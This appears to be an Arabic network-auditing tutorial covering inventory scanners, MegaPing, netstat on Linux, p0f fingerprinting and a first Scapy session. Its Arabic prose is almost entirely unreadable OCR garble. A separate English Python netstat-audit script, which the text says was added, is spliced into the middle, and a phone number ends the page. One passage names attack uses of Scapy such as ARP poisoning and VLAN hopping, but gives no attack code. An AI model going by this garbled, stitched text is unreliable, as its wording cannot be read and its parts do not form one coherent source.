[Screenshot: Completing the New Audit Wizard. "You are ready to start a new IP range scan. You can set the following options for this scan:" Do not record unavailable nodes (checked); Open scan progress dialog when scan starts (checked); Re-scan nodes that have been successfully scanned; Rescan, but no more than once a day. "To complete this wizard, click Finish."]

\j^\S> (process scan) o 3 ^ 1 ^1*=- o^j*^ J^h ^iUill j^ki -6 

[Screenshot: scan progress dialog. Columns: Name, Percent, Timestamp. Rows 0-12 list the hosts 10.0.0.2 through 10.0.0.14, a few with resolved Windows host names (for example ADMIN-PC), each stamped 08/22/12 15:36:2x. Options: Open this dialog when scan starts; Close this dialog when scan ...; Don't display completed ... Status: Scanned nodes 0/24. Button: Stop.]
[Screenshot: Global Network Inventory - Unregistered, main window after the scan (menu: Scan, Tools, Reports, Help). The result grid has the columns Timestamp, Host name, Status, MAC Address and OS, grouped by domain/workgroup and IP address, with one row per scanned host (status Success).]

-L>a ^A]| ^^^i* o^^s ls^j Scan summary 
.^j^l <L±*i q± jxj ^jL ^illj BIOS 

.AljJ La L-boi^ jSII J^Lk J-a JllilL jill J-a L^^Jl J^?^ ^ SjSlill j^ati ^jL (J^a^u f jii lS^J MEMORY 



Basic Network Troubleshooting Using MegaPing 

http://www.magnetosoft.com/ : j^^l 
^Jaj c # ^^rklJ ajjjja^I cjIj^VI jajj (toolkit) cjIj^VI <> uj^j ul ^^J^ ^ MegaPing 

4_jujLja3l laj3 <J-a*J! \lA ^lAaj\\ d^slxJI jiJl ^n/nll 4-lLaxJ ^akVl Wizard (jjj^^ C111JJJJ ^ jlj -J 



[Screenshot: MegaPing (Unregistered) main window. Menu: File, View, Tools, Help. Tool list: DNS List Hosts, DNS Lookup Name, Finger, Network Time, Ping, Traceroute, Whois, Network Resources, Process Info, System Info, NetBIOS Scanner, Share Scanner, Security Scanner, Port Scanner, Host Monitor.]
CjU» jIslxJI ^jAxJU <ul tiL ^j-^LiJ! ^Uaill (^ic *^ j^. jA\ ial_L<J! ^j^; <j| ^aia system info -3 
i^Vl^ c> ^ ^ iaU^ll connection gr^ j ^1511 J!>U> J jj^a jll ^1 j ^ j^VI 



[Screenshot: MegaPing (Unregistered), System Info > Connections tab (other tabs: Statistics, Interfaces, IP Routing, ARP; options: Auto Refresh, Active Only, Show Names, Report). Tool list as before, with IP Scanner also visible.]

Protocol  Port   PID    Local Address        Remote Addr...   State
TCP (34 ports, 12 connections, 14:34:42)
          135    780    0.0.0.0:135          0.0.0.0:0        LISTENING
          139    4      192.168.16.71...     0.0.0.0:0        LISTENING
          139    4      192.168.50.1:...     0.0.0.0:0        LISTENING
          139    4      192.168.133.1...     0.0.0.0:0        LISTENING
          554    4756   0.0.0.0:554          0.0.0.0:0        LISTENING
          902    2030   0.0.0.0:902          0.0.0.0:0        LISTENING
          912    2030   0.0.0.0:912          0.0.0.0:0        LISTENING
          1025   563    0.0.0.0:1025         0.0.0.0:0        LISTENING
          1026   996    0.0.0.0:1026         0.0.0.0:0        LISTENING
          1027   623    0.0.0.0:1027         0.0.0.0:0        LISTENING
          1023   404    0.0.0.0:1023         0.0.0.0:0        LISTENING
          1029   1530   0.0.0.0:1029         0.0.0.0:0        LISTENING
          1036   620    0.0.0.0:1036         0.0.0.0:0        LISTENING
          1241   652    127.0.0.1:1241       0.0.0.0:0        LISTENING

netstat >»VI 
? netstat 

^j^ii 6a£jjoJI ^ J^Loui ^-^V ^>*^ ^ ^.^'iuijj Windows NT. s*^lLuia1I JjixjuLill a j t^AiJ j ^jjo^jj ^ 

: netstat>&t cjUIjII^I 

j^bU jSaVI t*3 jLoJ! > tiA o- 3 ^ ^Itdl JIj <> ^ Vi.Vilt a<>u*\\ CjVU^j! jl*JaV [netstat] j^Vl Vjl 
.11a J£ £-H*J V ^1 j CjUij^a j djUij^a o^a^su (option) CjIj;^ jj^j <Lsu^j jjoj ^jil j t [netstat] 

^ ^-aUJI Jl^Jl ^ ^1 cjUUxII ^UuJ3 ^viun t [Unix socket]c5^ ^ lU^ c^ 3 ^ j^^^ [netstat] c> '^j 

.^jj^jjjoJI ^ (jyiLaall lie. Igj o^lc V ^jaJ tillil tdiVl^ajl ^ SjJjU-d -iaiijj V [UNIX socket] 

?LA^il uL£ j [netstatj^^t gai 6^J^^ Jxi) IjU 

.UDP J JJJ ^^Lujj ^1 diVt^V! (J^H o^ 3 ^ [-u] 
Uiajl j <JL^jVI 4_Ajta3l [process] t - ^ ^ ^* ^ ^ > <*-^-a j^*-* fa <^^j 6 [-n] j [-p] U^JJJ**^ ^l^VimU ^gj^ajij 

[root@dhcppc3 ~]# netstat -tupn
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.16.73:22        192.168.16.70:50834     ESTABLISHED 17122/sshd
tcp        1      0 192.168.16.73:57474     41.128.128.24:80        CLOSE_WAIT  14297/clock-applet
tcp        1      0 192.168.16.73:57473     41.128.128.24:80        CLOSE_WAIT  2799/clock-applet
tcp        0      0 192.168.16.73:37385     173.194.41.64:80        ESTABLISHED 29274/firefox
tcp        0      0 192.168.16.73:22        192.168.16.70:50835     ESTABLISHED 17126/sshd
[root@dhcppc3 ~]#

4<JUi]| djU^kll ^ U Ai^J <^U^ AjiaVl cjVI «1QU <*^I^<JI Ak. aJI ^H^J U JajjJaJb dbaJ l^jl .i^a [auditing] 

.IfkUS) ^ JU^I netstat j^i 0* J*^ 

?f g^iaj l-axuuj ^ji cgjjjj J^g^j ^jj^j J>^l g-^J cgj lJJ^j cgjj) CjUIaxJIj QJ& j^uJ) ^ ji J*i) )3U 

t^j W^l [listen] o^j^ 5^ ^ ls'^ netstat j*Vl [-1] ^I^l-U JaJl 

[root@dhcppc3 ~]# netstat -tupnl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      2188/dnsmasq
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      20210/sshd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      1707/cupsd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2002/master
tcp        0      0 127.0.0.1:6010          0.0.0.0:*               LISTEN      17122/sshd
tcp        0      0 :::80                   :::*                    LISTEN      2034/httpd
tcp        0      0 :::22                   :::*                    LISTEN      20210/sshd
tcp        0      0 ::1:631                 :::*                    LISTEN      1707/cupsd
tcp        0      0 ::1:25                  :::*                    LISTEN      2002/master
tcp        0      0 ::1:6010                :::*                    LISTEN      17122/sshd
udp        0      0 192.168.122.1:53        0.0.0.0:*                           2188/dnsmasq
udp        0      0 0.0.0.0:67              0.0.0.0:*                           2188/dnsmasq
udp        0      0 0.0.0.0:68              0.0.0.0:*                           16136/dhclient
udp        0      0 0.0.0.0:54244           0.0.0.0:*                           16984/local
udp        0      0 0.0.0.0:631             0.0.0.0:*                           1707/cupsd
[root@dhcppc3 ~]#

-c ^iU3l li^A j 80 a a >lklu^ j jL^ajl Cjj^aJ ftjjaala j ftjALa. L^jj ^aJ httpd <-ft^aJl 

. [firewall] ^j^^JI 1^ jjc ^jj iaLLJI (j^t> ^£^j3I ^jli ^ U j£i La£ (j^Jj 
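The listing above shows which daemon owns each listening socket and on which address it is bound. The following Python, added here as an example and not part of the original course material, parses `netstat -tupnl` output (a constructed sample that mirrors the page's listing) and separates loopback-only services from those reachable over the network, then checks the reachable ones against an allow-list so an auditor sees what should be closed or firewalled.

```python
"""Audit `netstat -tupnl` output: which listening services are reachable
from the network versus bound to loopback only.  Added example, not part
of the original page; the sample listing is constructed after the page's
own netstat output."""
import re
from collections import namedtuple

Listener = namedtuple("Listener", "proto addr port pid program exposure")

# Constructed sample mirroring the page's `netstat -tupnl` listing.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      2188/dnsmasq
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      20210/sshd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      1707/cupsd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2002/master
tcp        0      0 :::80                   :::*                    LISTEN      2034/httpd
tcp        0      0 ::1:631                 :::*                    LISTEN      1707/cupsd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           16136/dhclient
udp        0      0 0.0.0.0:631             0.0.0.0:*                           1707/cupsd
"""

# proto, Recv-Q, Send-Q, local, foreign, optional State (UDP has none), PID/Program
LINE_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+"
    r"(?:LISTEN\s+)?(?P<owner>\S+)\s*$"
)


def classify(addr):
    """Where a socket bound to `addr` can be reached from."""
    if addr == "::1" or addr.startswith("127."):
        return "loopback"
    if addr in ("0.0.0.0", "::"):
        return "all-interfaces"
    return "specific-interface"


def parse_listeners(text):
    """Parse netstat's server listing into Listener records; header lines are skipped."""
    listeners = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        addr, port = m.group("local").rsplit(":", 1)   # handles ':::80' and '::1:631'
        owner = m.group("owner")                        # '2034/httpd', or '-' if unknown
        pid, _, program = owner.partition("/")
        listeners.append(Listener(m.group("proto").rstrip("6"), addr, int(port),
                                  pid if pid != "-" else None, program or None,
                                  classify(addr)))
    return listeners


def exposed_services(listeners):
    """(proto, port, program) for every socket not confined to loopback."""
    return sorted({(l.proto, l.port, l.program) for l in listeners
                   if l.exposure != "loopback"})


def unexpected_listeners(listeners, allowed):
    """Exposed listeners whose (proto, port) is not in the allow-list,
    i.e. services that should be closed or blocked at the firewall."""
    return [l for l in listeners
            if l.exposure != "loopback" and (l.proto, l.port) not in allowed]


if __name__ == "__main__":
    found = parse_listeners(SAMPLE_NETSTAT)
    for svc in exposed_services(found):
        print("exposed: %s/%d %s" % svc)
    for l in unexpected_listeners(found, {("tcp", 22), ("tcp", 80)}):
        print("review: %s/%d %s bound to %s" % (l.proto, l.port, l.program, l.addr))
```

On a real host, replace SAMPLE_NETSTAT with the captured output of `netstat -tupnl` and put the services you intend to expose in the allow-list.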

yjlj jjp netstatj^Sfb J*jt &\ ^Iji^j IjU 



[root@dhcppc3 ~]# netstat -s | head -n 10
Ip:
    123800 total packets received
    5 with invalid addresses
    0 forwarded
    0 incoming packets discarded
    107918 incoming packets delivered
    99081 requests sent out
    69 dropped because of missing route
Icmp:
    4415 ICMP messages received
[root@dhcppc3 ~]#
;JN\S [-r] j^Jt {\*&U4 [routing table] Jj^ u^j^ ^ 



[root@dhcppc3 ~]# netstat -r
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
192.168.16.0    *               255.255.255.0   U         0 0          0 eth0
192.168.122.0   *               255.255.255.0   U         0 0          0 virbr0
default         192.168.16.1    0.0.0.0         UG        0 0          0 eth0
[root@dhcppc3 ~]#















jajj Ja 

a a( J?i\£ Actual CjL^jixA <j^a jxJ [-e] jj jt^I aI^L nb LusjIj [-j] jjjju]) aI^L nb AlxuJl ^ CjLa^Lua q^- 4 - 4 f*^ 



[root@dhcppc3 ~]# netstat -i
Kernel Interface table
Iface   MTU Met   RX-OK RX-ERR RX-DRP RX-OVR   TX-OK TX-ERR TX-DRP TX-OVR Flg
eth0   1500   0  121751      0      0      0   91743      0      0      0 BMRU
lo    16436   0   16449      0      0      0   16449      0      0      0 LRU
virbr0 1500   0       0      0      0      0       0      0      0      0 BMRU
[root@dhcppc3 ~]# netstat -ie
Kernel Interface table
eth0      Link encap:Ethernet  HWaddr 00:0C:29:51:41:91
          inet addr:192.168.16.73  Bcast:192.168.16.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe51:4191/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:121751 errors:0 dropped:0 overruns:0 frame:0
          TX packets:91743 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:138974644 (132.5 MiB)  TX bytes:6897808 (6.5 MiB)
          Interrupt:19 Base address:0x2000









[ifconfig] j-STI UU2 <UL [netstat -ie] j-Sfl oi ^* 



p0f SlAl 

I^VIS I gnj , ,-! j wireshark s^VI lSj5 l>« l^Jalajll ^ ^1 cjlaLlI JJaj] p0f ^,1^1 mi 

# p0f -s /tmp/targethost.pcap -o p0f-result.log -l 



Network DISCOVERY WITH SCAPY 

^jIjj j£ jj j^>JI (O^ jj j 6 c£ cJc-^^ 2^-^ scapy ic£^>^ ^jW*^ 

L_flLaLi£Vlj ^iiillj scanning <Jt ^j^*-*^ ^-g--^ Cy* ^ j^-^ 'jj. IgJaliiilL ^j^j ^^^LaiVI <J^-^ ^ ^ 1 " ♦ 

' arping' arp-sk'arpspoof <Hping s lU* lK> lA^ lJU^£Ij ^L^l^j tCjI^jll jlii^lj 

.tshark Jlj < tcpdump'Nmap J *l j>l c^j p0f 

(. . . 5 VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel) cjU£i3l jjj 
i^L^j] JU3I j^Vl ^I^IojI j^V^ ^ <^^j V c>j ^Uij ^1 jla Scapy (jjj^^l 



root@KaliAttacker# apt-get install python-scapy 



j£ ^Ul^! (-aha Jp J^l j-d Ijliaa l^JjUlS uij^u Jr^3 Scapy St jVI j-^ I^j ^b£i) (2)1^1 ^ cr^t ^I^-aJI U^u ^Jj Lu£ 

(network, port, protocol scanning)c> lS^J ^1 -2 

(tracerouting, firewalking, fingerprinting)i> ciL£&l -3 

(poisoning, leaking, sniffing)^W^ -4 

(text, html)) j^j^i ^\ -5 
AjjL un \ty*\ a .J 



.THREE WAY HANDSHAKE *£*5II <^L^L f Uill -6 
^ ^j^lSI f^-*^ ^ ^ i j .string cJI j loop cJI ^^lun <jl ^iLlaua t^jjlAj 4jJ 4_LjujI jj (^-^ g^^-o^ ^ 

.^Vl <f>J! Ji— j' :c«^ SCAPY f A tr^J 

.v, oil 



# scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
WARNING: No route found for IPv6 destination :: [no default route?]
Welcome to Scapy (2.2.0)



tillij ip !>H<i (j^Jj IP() lW-*^ ^ IP () lS^»-^ tillij Jjuj^aII (jt jjc 



>>> ip = IP()
>>> ip.display()
###[ IP ]###
  src= 127.0.0.1
  dst= 127.0.0.1
>>> ip.dst = "173.194.113.146"
>>> ip.display()
###[ IP ]###
  src= 192.168.16.73
  dst= 173.194.113.146
>>>


.ip.dst ^t^aJLualj 4\n»""j ^ u* J ( 127.0.0.1 c> (dst) J^j^' ub^- ^ ^ ^ J^5U - 



^ jijj IC1VIP 4^*3^ ^-l^Jujj L_fl jjuj j lg_LuJ^)j L_fl jjuj ^^jll 4^*3^ ^ ^J^^ J ^I^Jj (jVI ^ J^j 
>>> ping = ICMP()
>>> ping.display()
###[ ICMP ]###



.ICMP ^ lSj 1 ^ ping j^j (aJI JI^jVI 



>>> windows = sr1(ip/ping)
Begin emission:
..Finished to send 1 packets.
....
Received 5 packets, got 1 answers, remaining 0 packets
>>> windows.display()
###[ IP ]###
  version= 4L
  ihl= 5L
  tos= 0x0
  len= 28
  src= 173.194.113.146
  dst= 192.168.16.73
###[ ICMP ]###
>>>
KeyboardInterrupt
>>>



ILLoj <j51S Ig-T.rt ^^jII CjI jjjtMI ^ia^. ^jLoJ! <JiLa Uiajl TCP (O^ cJ^jl ^ 1 * ^1 i^i> ul 

.CjV j£ jjjjJI (>» ^j^xJI *c>Si ftbVl *>i& jl 

.exit() ^Aaajoij ^ J ls() ,>*VI ^bVlml (_3^^>ia (JC- dj^Lilx-<Jl j <La,lkjjuuJl CjV j£ jJ J^)^ ^J^> 

(01009943027) ^ 